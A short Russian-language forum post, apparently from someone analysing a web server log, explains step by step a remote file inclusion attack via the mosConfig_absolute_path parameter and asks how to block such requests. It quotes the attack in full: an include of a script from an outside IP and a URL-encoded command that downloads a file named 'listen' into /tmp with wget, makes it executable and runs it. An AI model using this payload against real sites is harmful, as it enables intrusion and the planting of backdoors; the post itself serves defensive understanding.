куки тут непричём.
поясняю пошагово:
...mosConfig_absolute_path=http://81.174.26.111/cmd.gif - это php-инклуюдинг.
далее идут команды:
cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
заходят во временную папку /tmp/ через сайт.. скачивают файл listen, ставят чмод на этот файл 744, запускают listen.. дальше хз чё.. вывод YYY)
зы: listen - может оказаться бекдором, руткитом, эксплоитом... и т.д.
Зависит ли результат выполнения такого запроса от содержимого файла index.php ??? И если да то сто вы могужете порекомендовать, для предотвращения подобных запросов .